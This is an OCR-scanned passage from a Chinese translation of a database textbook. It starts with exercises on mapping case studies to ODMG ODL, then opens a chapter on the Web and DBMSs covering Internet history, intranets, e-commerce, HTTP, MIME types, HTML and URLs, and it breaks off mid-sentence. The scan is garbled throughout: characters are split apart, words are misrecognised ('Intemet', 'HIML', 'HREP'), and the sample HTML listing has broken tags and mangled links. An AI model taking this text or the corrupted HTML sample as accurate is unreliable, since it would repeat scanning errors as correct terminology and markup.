将 习题 27.26 中 生成 的 University Accommodation Office 样 例 研 究 的 面向 对 象 的 数据 库 设计 映 
射 为 ODMG ODL。 

将 习题 27.27 中 生成 的 EasyDrive School of Motoring 样 例 研 究 的 面向 对 象 的 数据 库 设计 映射 为 
ODMG ODL。 

将 习题 27.28 中 生成 的 Wellmeadows 样 例 研 究 的 面向 对 象 的 数据 库 设 计 映射 为 ODMG ODL。 
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| 本 章 目标 

本 章 我 们 主要 学 习 : 

e Internet、Web、HTTP、HTML、URL 和 Web 服务 的 基本 概念 

e@ Web 作为 数据 库 平台 的 优 缺 点 

@ 将 数据 库 集成 到 Web 环境 的 主要 方法 : 

曙 脚本 语言 (JavaScript、VBScript、PHP 和 Perl) 

公共 网 关 接口 (CGI) 
HTTP cookie 
扩展 Web 服务 器 
Java、 JEE、 JDBC、 SQLJ、 CMP、 JDO、 JPA、 Servlets 和 JSP (JavaServer Pages) 
Microsoft Web 解决 方案 平台 : .NET、ASP (Active Server Page) 和 ADO (ActiveX 
Data Objects ) 
加 Oracle Internet 平台 


自 万 维 网 ( World Wide Web， 简 称 为 Web) 于 1989 年 诞生 以 来 ， 短 短 二 十 年 间 ， 它 就 
成 为 目前 最 流行 和 最 强大 的 联网 信息 系统 。 它 在 过 去 这 些 年 中 以 接近 指数 的 速度 不 断 发 展 ， 
掀起 了 一 场 信息 革命 ， 而 这 场 信息 革命 在 未 来 十 年 将 继续 下 去 。 因 此 Web 技术 和 数据 库 技 
术 的 结合 ， 能 为 推进 数据 库 技术 的 应 用 创造 更 多 的 机 遇 。 

Web 是 一 个 “以 数据 为 中 心 ” 的 交互 式 应 用 程序 的 传送 和 传播 平台 ， 非 常 引 人 注目 。 
Web 无 处 不 在 的 特点 使 其 可 以 在 全 球 各 个 角落 为 用 户 和 组 织 机 构 提供 服务 。 由 于 Web 的 体 
系 结构 被 设计 为 平台 无 关 ， 因 此 具有 降低 配置 成 本 和 训练 费用 的 潜力 。 目 前 各 类 组 织 机 构 正 
在 快速 构建 新 的 数据 库 应 用 ， 或 者 重 构 现 有 的 数据 库 应 用 ， 以 充分 利用 Web 这 个 战略 性 的 
平台 来 实现 革新 性 的 商业 解决 方案 ， 这 使 各 类 组 织 机 构 的 结构 日 益 演 变 为 以 Web 为 中 心 。 

政府 机 构 和 教育 机 构 已 经 不 再 是 Internet ( Web 是 其 部 分 表现 形式 ) 发 展 的 主要 推动 力 ， 
Internet 正在 成 为 社会 团体 、 教 育 和 政府 机 构 ， 以 及 个 人 之 间 最 重要 的 新 沟通 介质 。Internet 
和 公司 内 部 /外 部 网 将 继续 保持 快速 的 发 展 速度 ， 在 计算 的 历史 上 ， 这 将 使 全 球 在 前 所 未 有 
的 广度 范围 内 相互 联系 起 来 。 

目前 许多 网 站 是 基于 文件 的 ， 每 个 Web 文档 存储 在 一 个 单独 的 文件 中 。 对 于 小 型 网 站 ， 
这 种 做 法 不 会 有 什么 问题 。 然 而 ， 对 于 大 型 网 站 ， 这 可 能 导致 许多 严重 的 管理 问题 。 例 如 ， 
维持 这 些 成 百 上 千 文 件 的 副本 已 经 很 困难 ， 维 持 这 些 文件 的 链接 就 更 加 困难 ， 如 果 这 些 文件 
是 由 不 同 的 作者 创建 和 维护 时 更 甚 。 

第 二 个 问题 的 来 源 在 于 : 许多 网 站 包含 了 诸多 动态 属性 的 信息 ， 如 产品 和 报价 信息 。 在 
数据 库 和 各 个 HTML 文件 中 (参见 29.2.2 节 ) 分 别 维持 这 些 信息 ， 不 仅 工 作 量 非常 繁重 ， 而 
且 保 持 同步 也 非常 困难 。 因 为 诸如 此 类 的 一 些 原因 ， 人 允许 Web 直接 访问 数据 库 来 动态 管理 


锚 29 茧 HEb 其 大 与 DBMS 201 


Web 的 内 容 成 为 了 越 来 越 流行 的 方法 。 将 Web 信息 存储 在 数据 库 中 的 方案 可 以 取代 或 补充 
文件 存储 方案 。 本 章 的 目标 是 分 析 Web-DBMS 集成 的 一 些 技 术 ， 讨 论 它们 各 自 的 特色 。 关 
于 这 些 技术 的 深入 讨论 超出 了 本 书 的 讨论 范围 ， 有 兴趣 的 读者 可 以 参考 本 书 最 后 “深入 阅 
读 ” 部 分 给 出 的 本 章 所 提 到 的 附加 阅读 材料 。 


| 本 章 结构 

29.1 节 和 29.2 节 对 Internet 和 Web 技术 进行 了 简要 介绍 ， 并 分 析 了 Web 适合 作为 数据 
库 应 用 平台 的 原因 。29.3 节 至 29.9 节 分 析 了 将 数据 库 集成 到 Web 环境 中 的 各 种 方法 。 本 章 
的 例子 取 自 11.4 节 和 附录 A 中 的 DreamHome 案例 。 本 章 某 些 部 分 涉及 的 XML ( eXtensible 
Markup Languages， 扩 展 标记 语言 ) 及 其 相关 技术 ， 将 在 后 续 章节 中 进行 讨论 。 但 读者 需要 
清楚 地 认识 到 XML 在 网 络 环境 中 所 起 的 重要 作用 。 


29.1 Internet 和 Web 简介 


| Internet | 世界 范围 内 互联 的 计算 机 网 络 的 集合 。 


Internet 由 许多 分 离 但 又 互联 的 商业 、 教 育 和 政府 组 织 以 及 Internet 服 务 提 供 商 
(Internet Service Provider，ISP) 的 网 络 构成 。Internet 可 提供 的 服务 包括 电子 邮件 (E-mail)、 
网 络 会 议和 聊天 服务 ， 以 及 访问 远程 计算 机 、 发 送 /接收 文件 等 。Internet 开始 于 20 世纪 60 
年 代 末 70 年 代 初 ,美国 国防 部 有 一 个 名 为 ARPANET ( Advanced Research Project Agency 
NETwork) 的 实验 项 目 ， 该 项 目的 初始 目的 是 为 了 研究 如 何 建立 在 局 部 遭 到 损害 (比如 核弹 
袭击 ) 的 情况 下 仍 能 工作 的 网 络 。 

1982 年 ，TCP/IP ( Transmission Control Protocol and Internet Protocol， 传 输 控制 协议 和 
互联 协议 ) 被 采用 为 ARPANET 的 标准 通信 协议 。TCP 用 于 确保 信息 从 一 台 计 算 机 正确 地 传 
输 到 另 一 台 计 算 机 。IP 管理 机 器 间 数 据 包 的 发 送 和 接收 ， 它 基于 一 个 四 字 节 的 目标 地 址 (IP 
数 )， 这 个 IP 地 址 是 由 Internet 管理 机 构 分 配给 各 个 组 织 的 。TCP/IP 这 个 术语 有 时 用 来 指 所 
有 的 Internet 协议 集合 ， 例 如 FTP (File Transfer Protocol， 文 件 传 输 协 议 )、SMTP ( Simple 
Mail Transfer Protocol， 简 单 邮件 传输 协议 )、Telnet (Telecommunication Network， 通 信和 网 络 )、 
DNS (Domain Name Service， 域 名 服务 ) 和 POP (Post Office Protocol， 邮 局 协议 ) 等 。 

在 开发 这 项 技术 的 过 程 中 ， 军 方 有 力 地 联合 了 企业 和 大 学 的 力量 。NSF ( National 
Science Foundation， 美国 国家 科学 基金 ) 接替 了 继续 研究 的 任务 ， 在 1986 年 建设 成 功 
了 NSFNET (National Science Foundation NETwork， 美 国 国 家 科学 基金 网 络 )， 构 成 了 
新 的 骨干 网 。 在 NSF 的 赞助 下 ， 这 个 骨干 网 逐渐 形成 了 人 们 今天 所 知 的 Internet。 然 而 
1995 年 后 NSFNET 就 不 再 是 Internet 的 骨干 网 ， 其 地 位 被 完全 商业 化 的 骨干 网 所 取代 。 
当前 的 Internet 可 视 为 有 虚拟 图 书馆 、 临 街 商铺 、 商 业 办 公 室 、 艺 术 画 廊 构 成 的 一 个 电子 
城市 。 

Internet 有 另 一 个 更 加 通俗 的 术语 ， 特 别 是 在 媒体 上 ， 就 是 “信息 高 速 公路 ”。 它 隐 含 着 
如 下 意义 ， 即 未 来 的 网 络 应 当 为 世界 上 的 所 有 用 户 提供 互联 的 能 力 、 访 问 信息 的 能 力 以 及 在 
线 服务 。 这 个 术语 第 一 次 使 用 是 在 1993 年 美国 前 副 总 统 戈 尔 的 一 次 演讲 中 ， 他 在 演讲 中 规划 
了 一 个 高 速 国家 数据 通信 网 络 的 蓝图 ， 它 的 原型 就 是 Internet。Microsoft 总 裁 比尔 盖 茨 在 
他 的 《未 来 之 路 》(“The Road Ahead”) 一 书 中 把 信息 高 速 公 路 与 美国 国家 公路 系统 相 比拟 ， 
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Internet 代表 了 新 的 通信 网 络 建造 的 开始 (Gates，1995 )。 

NSF 资助 Internet 的 目的 是 允许 美国 大 学 共享 五 个 国家 超级 计算 中 心 的 资源 。 随 着 它 的 
用 户 数 目 快速 增长 ， 访 问 网 络 的 费用 也 越 来 越 低 ， 使 得 国内 用 户 能 够 在 他 们 各 自 的 个 人 计算 
机 上 访问 Internet。 到 20 世纪 90 年 代 早期 ， 可 通过 Internet 访问 的 信息 量 迅速 增长 ， 使 得 
Archie、Gopher、Veronica 和 WAIS (Wide Area Information Service， 广 域 信息 服务 ) 等 提供 
基于 菜单 界面 的 索引 和 搜索 服务 站 点 遍布 各 地 。 与 之 相 比 ,Web 使 用 超 文本 来 提供 浏览 服务 ， 
产生 了 许多 Web 搜索 引擎 如 Google 、Yahoo! 和 MSN 等 。 

ARPANET 开始 只 有 少数 结 点 ， 而 到 1997 年 1 月 ， 据 估计 Intemet 已 有 超过 1 亿 的 用 户 S。 
一 年 之 后 ， 这 个 估计 数目 已 上 升 到 超过 100 个 国家 的 2.7 亿 用 户 。2000 年 末 ， 该 数字 超过 
4.18 亿 , 在 2004 年 更 是 达到 了 9.45 亿 。2012 年 ， 用 户 总 数 达到 了 22.7 亿 ， 占 全 球 70 亿 人 
口 的 35%。 其 中 50% 的 增长 来 自 亚 洲 。 此 外 ， 索 引 网 页 数目 高 达 91.2 亿 。 


29.1.1 企业 内 联网 与 外 联网 


| 企业 内 联网 | 属于 一 个 组 织 的 站 点 或 站 点 群 ， 只 能 被 组 织 内 部 的 成 员 访问 。 


支持 E-mail 收发 和 网 页 发 布 的 内 部 商业 性 互联 网 络 目前 应 用 得 越 来 越 广泛 ， 被 称 为 企 
业内 联网 (intranet)。 通 常 企业 内 联网 要 通过 防火 墙 连接 到 广 域 mternet (参见 20.5.2 节 )， 
防火 墙 可 对 进出 企业 内 联网 的 信息 加 以 审查 限制 。 例 如 允许 内 部 职员 使 用 外 部 E-mail、 访 
问 任意 的 外 部 网 站 ; 但 组 织 以 外 的 人 员 发 送 E-mail 进入 组 织 将 受到 限制 ， 并 禁止 浏览 企业 
内 联网 的 网 页 。 安 全 的 企业 内 联网 与 基于 私有 协议 的 私有 网 络 相 比 ， 建 造 和 管理 的 费用 都 更 
低 ， 因 此 正在 成 为 快速 增长 的 Internet 应 用 的 一 部 分 。 


| 企业 外 联网 | 部 分 授权 的 外 来 者 可 访问 的 企业 内 联网 。 


企业 内 联网 位 于 防火 墙 后 ， 仅 有 同一 组 织 的 成 员 才 可 访问 ， 企 业 外 联网 〈extranet) 则 为 
外 来 者 提供 不 同 级 别 的 访问 权限 。 通 常情 况 下 ， 仅 当 外 来 者 给 出 有 效 的 用 户 名 和 口令 时 才 可 
访问 企业 外 联网 ， 由 身份 识别 的 结果 来 决定 该 外 来 者 可 访问 企业 外 联网 的 哪 一 部 分 。 企 业 外 
联网 正在 成 为 非常 流行 的 商业 伙伴 间 交 换 信息 的 手段 。 

还 有 一 些 类 似 的 设施 方案 已 应 用 了 许多 年 。 例 如 EDI ( Electronic Data Interchange， 电 
子 数 据 交 换 ) 允许 机 构 将 库存 和 采购 系统 连接 起 来 。 这 种 连接 促进 了 即时 的 库存 和 生产 方 
式 ( 即 商品 能 够 按照 需求 制造 并 发 送 给 零售 商 ) 的 推广 。 然 而 ，EDI 所 需 的 基础 设施 非常 
昂贵 。 一些 机 构 使 用 昂贵 的 租用 线路 ， 更 多 的 机 构 将 基础 设施 外 包 给 增值 网 ( Value-Added 
Network,VAN) 厂商 ,但 这 仍 比 使 用 Internet 要 昂贵 得 多 。EDI 还 需要 昂贵 的 应 用 集成 费用 ， 
因而 在 运输 、 制 造 、 零 售 等 关键 市 场 的 推广 非常 缓慢 。 

对 比 而 言 ， 构 造 企 业 外 联网 就 相对 简单 。 它 使 用 标准 的 Internet 组 件 : Web 服务 器 、 浏 
览 器 或 基于 applet 的 应 用 程序 ， 以 及 作为 通信 基础 设施 的 Internet。 此 外 ， 企 业 外 联网 允许 
机 构 为 客户 提供 商品 的 信息 。 例 如 美国 联邦 快递 提供 了 一 个 企业 外 联网 来 允许 客户 跟踪 他 们 
自己 的 包 庄 。 可 以 通过 企业 外 联网 的 应 用 节省 开销 ， 例 如 将 以 纸 为 媒介 的 信息 移 到 Web 上 ， 
用 户 可 以 在 需要 的 时 候 访 问 这 些 数据 ， 这 可 以 有 效 地 节省 机 构 花 在 打印 、 汇 编 打 包 信 息 以 及 
邮寄 上 的 庞大 开支 和 资源 。 


日 在 上 下 文中 ，Internet 意味 着 Web 、E-mail、FTP 、Gopher 和 Telnet 服务 。 
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本 章 使 用 更 一 般 的 术语 Internet 来 表示 企业 内 联网 和 企业 外 联网 。 


29.1.2 ”电子 贸易 和 电子 商务 


Internet 的 出 现 为 电子 贸易 (E-Commerce) 和 电子 商务 (E-Business) 提供 了 许多 机 会 ， 
这 一 点 目前 已 引起 了 广泛 关注 。 和 许多 新 兴 事 物 一 样 ， 关 于 这 两 个 术语 的 准确 定义 目前 还 存 
在 许多 争论 。 世 界 上 最 大 的 商业 组 织 之 一 Cisco Systems 定义 了 Internet 电子 商务 变革 的 五 
个 递增 阶段 : 

阶段 1 : 电子 邮件 ”与 通过 内 联网 通信 和 交换 文件 一 样 ， 此 阶段 的 商务 活动 开始 允许 供 
应 商 和 客户 之 间 使 用 Internet 作为 外 部 通信 介质 进行 通信 ， 有 效 地 提高 了 商务 活动 的 效率 ， 
使 通信 的 全 球 化 变 得 简单 。 

阶段 2: 网 站 此 阶段 的 商务 活动 以 网 站 为 “橱窗 ”向 世界 展示 商品 。 网 站 可 以 使 顾客 
在 任何 时 间 、 任 何 地 方 同 商家 沟通 ， 即 使 是 最 小 的 交易 也 可 以 面向 全 球 。 

阶段 3: 电子 贸易 


| 电子 贸易 | 客户 可 以 通过 商务 网 站 下 订单 并 结账 。 


此 阶段 的 商务 活动 不 仅 使 用 网 站 作为 展示 商品 的 动态 “橱窗 ”， 而 且 提 供 了 在 线 的 支持 
和 服务 ， 包 括 一 些 在 20.5.7 节 曾 介绍 过 的 安全 交易 技术 。 这 些 技术 使 得 交易 能 够 在 任意 时 间 
进行 ， 因 而 增加 了 销售 机 会 ， 降 低 了 销售 和 服务 的 成 本 ， 提 升 了 客户 满意 度 。 

阶段 4: 电子 商务 


| 电子 商务 | 此 阶段 Internet 技术 被 完备 地 集成 到 商务 经 济 的 基础 架构 中 。 


此 阶段 的 商务 活动 在 许多 方面 都 应 用 到 Internet 技术 。 内 部 和 外 部 的 许多 活动 都 可 通过 
企业 内 联网 和 企业 外 联网 进行 ， 销售、 服务 和 推销 都 基于 Web 进行 。 其 潜在 的 优势 在 于 ， 
商务 活动 沟通 速度 变 得 更 快 ， 过 程 变 得 更 顺畅 且 更 有 效率 ， 生 产 力 也 大 大 提高 。 

阶段 5 : 生态 系统 ”此 阶段 的 整个 商务 过 程 都 是 通过 Internet 自动 进行 的 。 客 户 、 供 应 
商 、 重 要 的 合作 伙伴 、 企 业 基础 结构 部 门 都 集成 为 一 个 无 颖 连接 的 系统 。 人 们 认为 这 可 以 降 
低 成 本 、 提 高 产量 、 有 效 地 提高 竞争 力 。 

福 里 斯 特 研 究 小 组 ( Forrester Research Group) 和 eMarketer 表示 ，2011 年 网 上 交易 总 
额 已 经 达到 了 2250 亿美 元 ，2016 年 有 望 达到 3620 亿美 元 ， 其 中 计算 机 和 消费 电子 产品 将 
占 市 场 份额 的 22%， 服 装 及 其 饰品 将 占 市 场 20% 的 份额 。 贸 易 研 究 中 心 (Center for Retail 
Research) 预测 2012 年 欧洲 电子 商务 将 以 2320 亿美 元 的 交易 额 超越 美国 。 据 预测 ，B2B 
(Business-to-Business) 将 在 未 来 超越 B2C ( Business-to-Consumer) 市 场 ， 其 利润 将 超越 后 
者 数 倍 。 借 助 全 球 互联 网 络 ， 企 业 可 以 直接 面 对 25 亿 消 费 者 (世界 人 口 总 数 的 35%)。 


29.2 Web 


| 万 维 网 | 一 个 基于 超 媒体 的 系统 ， 提 供 以 超 链 接 而 非 顺序 的 方式 浏览 Internet 信息 。 


万 维 网 (后 面 简称 为 Web) 提供 了 以 比较 简单 的 “指向 并 点 击 ” 方 式 浏览 Internet 信息 
的 途径 (Berners-Lee，1992; Berners-Lee 等 人 ，1994 )。Web 上 的 信息 是 以 网 页 的 形式 组 织 
的 ， 网 页 是 文本 、 图 像 、 图 片 、 音 频 、 视 频 的 集合 。 此 外 ， 网 页 还 包含 到 其 他 页 面 的 超 文本 
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链接 ， 超 文本 链接 能 使 用 户 以 非 顺 序 的 方式 浏览 信息 。 

Web 的 成 功 很 大 程度 上 归功 于 它 为 用 户 带 来 的 便捷 ， 用 户 可 以 通过 Web 提供 、 使 用 和 
引用 分 布 于 世界 各 地 的 信息 。 此 外 ，Web 使 用 户 能 够 浏览 多 媒体 文档 而 不 管 计 算 机 的 硬件 配 
置 如 何 。 它 也 和 其 他 现存 的 数据 通信 协议 兼容 ， 例 如 Gopher，FTP (文件 传输 协议 )，NNTP 
(网 络 新 闻 传 输 协议 ) 以 及 Telnet (远程 登录 会 话 协议 )。 

Web 由 两 类 联网 的 计算 机 组 成 : 提供 信息 的 服务 器 ， 以 及 请 求 信 息 的 客户 机 (或 者 浏 
览 器 )。Web 服务 器 的 实例 包括 : Apache HTTP Server、Microsoft IIS ( Internet Information 
Server) 和 GWS (Google Web Server)。Web 浏览 器 的 实例 包括 Microsoft Internet Explorer、 
Firefox 、Opera 和 Safari。 

Web 上 的 大 多 数 存储 信息 的 文档 采用 HTML ( HyperText Markup Language， 超 文本 标 
记 语 言 ) 来 编写 ， 浏 览 器 要 想 显 示 这 些 文档 就 必须 能 解释 HTML 协议 。 而 Web 服务 器 和 浏 
览 器 间 交 换 信息 的 主流 协议 是 HTTP ( HyperText Transfer Protocol， 超 文本 传输 协议 ) 。 文 档 
的 存储 定位 是 通过 URL (Uniform Resource Locator， 统 一 资源 定位 ) 给 出 唯一 标识 地 址 。 图 
29-1 解释 了 Web 环境 的 基本 组 件 。 下 面 详细 讨论 HTTP、HTML 和 URL。 
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29-1 Web 环境 的 基本 组 件 


29.2.1 超 文 本 传输 协议 


| HTTP | 用 来 在 Internet 上 传递 网 页 的 协议 。 


HTTP (HyperText Transfer Protocol， 超 文本 传输 协议 ) 定义 了 客户 和 服务 器 之 间 如 何 进 
行 通 信 。HTTP 是 在 客户 和 服务 器 间 传 输 信息 的 、 通 用 的 、 面 向 对 象 的 无 状态 协议 (Berners- 
Lee，1992 ) 。 早 期 Web 开发 使 用 HTTP/0.9。1995 年 公布 的 9 RFC 1945 定义 了 HTTP/1.0， 
这 个 版 本 的 协议 应 用 得 相当 普遍 ( Berners-Lee 等 人 ，1996 )。 最 近 的 版 本 HTTP/1.1 提供 了 
更 多 的 功能 ， 并 支持 服务 器 在 客户 的 同一 请 求 上 处 理 多 个 事务 。 


昌 一 个 RFC ( Request For Comment) 是 一 种 文档 类 型 ， 这 类 文档 或 定义 标准 或 提供 一 类 话题 信息 。 许 多 Internet 
和 网 络 标准 都 用 RFC 定义 ,在 Internet 上 即 可 选用 。 任 何人 都 可 提交 建议 某 些 更 新 的 RFC。 
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HTTP 是 基于 请 求 - 响应 机 制 的 。 一 个 HTTP 处 理 过 程 由 下 列 步骤 组 成 : 

e 建立 连接 : 客户 和 Web 服务 器 建立 连接 。 

@ 请 求 : 客户 向 Web 服务 器 发 送 请 求 信息 。 

e 响应 : Web 服务 器 向 客户 发 送 响 应 (例如 HTML 文档 )。 

@ 关闭 连接 : Web 服务 器 关闭 连接 。 

HTTP 目前 是 一 个 无 状态 协议 ， 即 服务 器 不 保存 不 同 请 求 间 的 任何 信息 。Web 服务 器 不 
保存 上 次 请 求 的 信息 。 这 意味 着 用 户 在 页 面 上 输入 的 任何 信息 (比如 填 在 表格 中 的 数据 ) 在 
请 求 下 个 页 面 时 不 能 自动 可 用 ， 除 非 Web 服务 器 采取 某 种 办 法 在 服务 器 中 的 数 千 请 求 中 区 
分 出 来 发 自 同一 用 户 的 请 求 。 对 于 多 数 应 用 程序 ，HTTP 的 这 种 无 状态 特性 是 有 益 的 ， 因 为 
这 使 得 客户 和 服务 器 之 间 的 逻辑 更 为 简单 ， 并且 无 须 为 旧 的 请 求 耗费 额外 的 内 存 和 磁盘 空 
间 。 遗 憾 的 是 ，HTTP 的 这 种 无 状态 特性 不 能 够 支持 数据 库 事务 所 必需 的 会 话 概念 。 人 们 已 
经 提出 了 一 些 不 同 的 方案 用 来 弥补 HTTP 的 这 种 无 状态 特性 ， 例 如 在 返回 的 Web 页 面 中 包 
含 隐 藏 的 字段 用 来 存储 交易 标识 符 ， 或 者 所 有 的 Web 页 面 表格 中 的 信息 都 在 本 地 输入 并 作 
为 一 个 单一 的 事务 提交 。 这 些 方案 支持 的 应 用 类 型 都 是 有 限 的 ， 并 且 需 要 对 Web 服务 器 进 
行 扩 展 ， 这 些 将 在 本 章 后 面 加 以 讨论 。 

多 用 途 Internet 邮件 扩展 协议 

MIME ( Multipurpose Internet Mail Extension， 多 用 途 Internet 邮件 扩展 协议 ) 规范 定 
义 了 将 二 进 制 数据 编码 为 ASCII 的 标准 ， 以 及 指示 消息 中 所 含 数据 的 类 型 标准 。 虽 然 它 原 
来 是 用 于 电子 邮件 客户 软件 的 ， 但 Web 现在 也 使 用 MIME 标准 确定 如 何 处 理 多 媒体 类 型 。 
MIME 类 型 使 用 类 型 / 子 类 型 格式 来 标识 ,“ 类 型 ”定义 所 发 送 数据 的 一 般 类 型 ,“ 子 类 型 ” 
定义 所 用 格式 的 具体 类 型 。 例 如 ， 一 幅 GIF 图 像 将 格式 化 为 image/gif。 表 29-1 给 出 了 其 他 
的 一 些 有 用 的 类 型 ( 带 默认 文件 扩展 名 )。 


表 29-1 一 些 有 用 的 MIME 类 型 


本 html HTML 文件 (*.htm，*.html) 
plain 规则 的 ASCII 文件 (*.txt) 


联合 图 像 专 家 组 文件 (*.jpg) 


image gif 图 像 交换 格式 文件 (*.gif) 
x-bitmap Microsoft 位 图 文件 (*.bmp) 
x-msvideo Microsoft 音频 视频 交错 文件 (*.avi) 

video quicktime Apple QuickTime 电影 文件 (*.mov) 
mpeg 运动 图 像 专家 组 文件 (*.mpeg) 
postscript Postscript 文件 (*.ps) 

application pdf Adobe Acrobat 文件 (*.pdf) 
java Java 类 文件 (*.class) 

HTTP 请 求 


HTTP 请 求 包含 协议 头 和 可 选 的 协议 体 ， 协 议 头 指示 请 求 类 型 、 资 源 名 以 及 HTTP 版 本 。 


协议 头 同 协议 体 间 用 空 行 隔 开 。 主 要 的 HTTP 请 求 类 型 包括 : 


。 GET: 它 是 最 常用 的 请 求 类 型 之 一 ， 用 来 获取 用 户 请 求 的 资源 。 
®。 POST : 男 一 个 常见 的 请 求 类 型 ， 用 来 把 数据 传输 给 指定 的 资源 。 通 常 发 送 的 数据 
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来 源 于 用 户 填 写 的 HTML 表格 ,服务 器 可 以 使 用 此 数据 来 搜索 Internet 或 查询 数 
据 库 。 

e HEAD: 类 似 于 GET, 但 是 强迫 服务 器 仅 返 回 HTTP 头 ， 而 不 是 响应 数据 本 身 。 

e PUT (HTTP/1.1 ): 将 资源 上 传 到 服务 器 。 

e。 DELETE (HTTP/1.1 ): 删除 服务 器 上 的 资源 。 

e。 OPTIONS (HTTP/1.1 ): 请 求 服 务 器 配置 选项 。 

HTTP 响应 

HTTP 响应 包含 一 个 响应 头 和 一 个 响应 体 ， 响 应 头 又 包含 HTTP 版 本 、 响 应 状态 、 控 制 

响应 行为 的 信息 ， 响 应 体 包含 响应 要 求 的 数据 。 协 议 头 和 响应 体 是 用 一 个 空 行 隔 开 的 。 


29.2.2” 超 文本 标记 语言 
| HTML | 大 多 数 网 页 设计 使 用 的 文档 格式 化 语言 。 


HTML (HyperText Markup Language， 超 文本 标记 语言 ) 是 一 套 标记 或 标注 文档 以 将 其 发 
布 到 Web 上 的 体系 。HTML 定义 了 网 络 结 点 间 如 何 进行 传输 。 它 是 简单 、 有 效 且 平台 无 关 的 
文档 语言 (Berners-Lee and Connolly，1993 )。HTML 原来 是 Tim Berners-Lee 在 CERN 时 开发 
的 ， 并 且 在 1995 年 11 月 被 IETF ( Internet Engineering Task Force，Internet 工程 任务 组 ) 接受 
为 RFC 1866 标准 (通常 被 称 为 HTML 版 本 2 )。 该 语言 仍 在 不 断 发 展 中 ， 目 前 W3C ( World 
Wide Web Consortium， 万维网 协会 ) 9 建议 使 用 的 版 本 为 HTML 4.01， 该 版 本 定义 了 框架 、 样 
式 表 、 脚 本 和 艇 入 式 对 象 ( W3C，1999a)。2000 年初，W3C 推出 了 采用 XML ( eXtensible 
Markup Language， 扩 展 标 记 语 言 ) 的 HTML 4 标准 一 一 XHTML 1.0 (eXtensible HyperText 
Markup Language， 扩 展 超 文本 标记 语言 )(W3C，2000a)。 下 一 章 将 讨论 XML。 

W3C 依 托 网 络 超 文 本 应 用 技术 工作 小 组 (Web Hypertext Application Technology 
Working Group)， 目 前 正在 研究 下 一 代 规 范 一 一 HTML5。HTML5 已 在 2014 年底 推 出 稳定 
版 本 ， 它 加 入 了 许多 新 的 语法 特性 ， 如 <vedio> 、<audio> 、<canvas> 元 素 ， 并 集成 了 可 扩 
展 矢量 图 形 ( Scalable Vector Graphics，SVG) 内 容 以 及 支持 数学 公式 的 MathML。 这 些 新 
特性 使 得 Web 可 以 轻松 处 理 多 媒体 和 图 像 内 容 ， 而 不 必 求 助 于 其 他 插件 和 API。 提 出 诸如 
<section> 、<article> 、<header> 和 <nav> 等 新 元 素 可 以 丰富 文档 的 语义 内 容 。 

HTML 的 设计 意图 是 为 了 使 各 种 类 型 的 设备 ， 例 如 带 有 不 同 分 辨 率 和 彩色 深度 的 图 形 显 
示 器 的 PC、 移 动 电话 、 手 持 设备 、 语 音 输入 输出 设备 等 都 可 以 使 用 Web 上 的 信息 。 

HTML 是 SGML (Standardized Generalized Markup Language， 一 般 标准 化 标记 语言 
的 应 用 ，SGML 是 专用 于 定义 结构 化 文档 类 型 和 表示 这 些 文档 类 型 实例 的 标记 语言 ( ISO， 
1986 )，HTML 就 是 这 样 一 种 标记 语言 。 图 29-2 显示 了 部 分 HTML 页 面 a， 以 及 Web 浏览 
器 上 显示 的 相应 页 面 b。 

在 HTML 文件 中 用 HREF 标记 链接 ， 而 在 显示 页 面 上 表现 为 用 下 划 线 突出 被 链接 的 文 
字 。 在 许多 浏览 器 中 ， 当 鼠标 指向 某 个 这 样 的 链接 时 ， 光 标 形状 会 发 生变 化 ， 以 说 明 该 段 文 
字 是 到 另 一 文档 的 超 链接 。 


9 W3C 是 个 国际 联合 组 织 ， 其 目的 是 监督 Web 的 发 展 。 
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<HTML> 

<HEAD> | 1 
<TITLE>Database Systems: A Practical Approach to Design, Implementation and Management </TITLE> 。 
</HEAD> . 
<BODY bgcolor=#FFFFCC 

<H2>Database Systems: A Practical Approach to Design, Implementation and Management</H2> ， 


<P>Thank you for visiting the Home Page of our database text book, From this page you can view online a 0 of chapters om the 
book. Academics can also access the Jnstructors Guide, but this requires the specification ofa user name and oo which pt a be 
obtained from Addison Wesley Longman. <BR> 


<BR> 

<A HREF="http://cis.paisley.ac.uk/conn-ciO/book/toc.html" >Table of Contents <BR> 

</A><A HREF="http://cis.paisley.ac.uk/conn-ci0/book/chapterl.html">Chapter 1 Introduction ee 

</A><A HREF="http://cis.paisley.ac.uk/conn-ciO/book/chapter2.html">Chapter 2 Database Environment <BR> 
</A><A HREF="http://cis.paisley.ac.uk /conn-ci0/book/chapter3.html">Chapter 3 The Relational Dat Model 
</A></P> 

<P><A HREP="http://cis.paisley.ac.uk/conn-ciO/book/ig.html">Jnstractors Guide</A></P> 

<P>If you have any comments, we would be more than happy to hear from you.</P> 

<P><IMG SRC="net,gif"” HEIGHT=34 WIDTH=52 ALIGN=CENTER> 

<A HREF="mailto:conn-ci0@paisley.ac.uk" >EMail</A> 

<IMG SRC="fax.gif" HEIGHT=34 WIDTH=43 ALIGN=CENTER> 
<A>g&nbsp;8&nbsp;&nbsp;Fax:8nbsp;0141-848-3542</P> | ， ， | 
</BODY> 

</HIML> 





a) 一 个 HTMI 文 件 





a Systems: ractical Approach to Design, 
Implementation and Management 


Table of Contents WELCOME 
Chapter 1 introduction 


Chapter 2 Database Thank you for isiting the Home Fage of our database fext book. 
Environment From this page you can view online a selection of chapters from the 
Chapter 4Database bobk Acatlemics Can 50 access the Instructors Gutde, but this 
requires the specification of a User name and password. Which must 
ANrchiteciures 
first be obtained from Addison Wesiey Longman. 





Chapter 4 The Relational 
Hodel 








b) 在 Internet Explorer 浏 览 器 上 显示 的 相应 HTML 页 面 ， 其 中 下 划 线 表示 超 链接 


图 29-2 HTML 实例 
29.2.3 ”统一 资源 定位 符 


URL | 由 字母 和 数字 混合 组 成 的 字符 事 ， 用 来 表示 Internet 上 资源 的 地 址 或 区 域 ， 以 及 应 该 
如 何 访问 该 资源 。 


URL (Uniform Resource Locator， 统 一 资源 定位 符 ) 定义 了 文档 和 资源 在 Internet 上 能 
被 唯一 定位 的 标志 。 其 他 相关 的 术语 包括 URI 和 URN。URI ( Uniform Resource Identifier， 
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统一 资源 标识 符 ) 是 引用 Internet 资源 的 所 有 名 称 /地 址 的 类 属 集合 。URN ( Uniform 
Resource Name， 统 一 资源 名 ) 指示 了 Internet 上 的 资源 ,但 使 用 的 是 永久 的 、 位 置 无 关 的 名 
称 。URN 是 非常 概括 性 的 ， 不 但 依赖 于 名 称 查找 服务 ， 而 且 依赖 于 非 长 期 稳定 的 额外 服务 
(Sollins 和 Masinter，1994 )。 与 之 相反 ，URL 使 用 基于 资源 位 置 的 方案 在 Internet 上 标识 一 
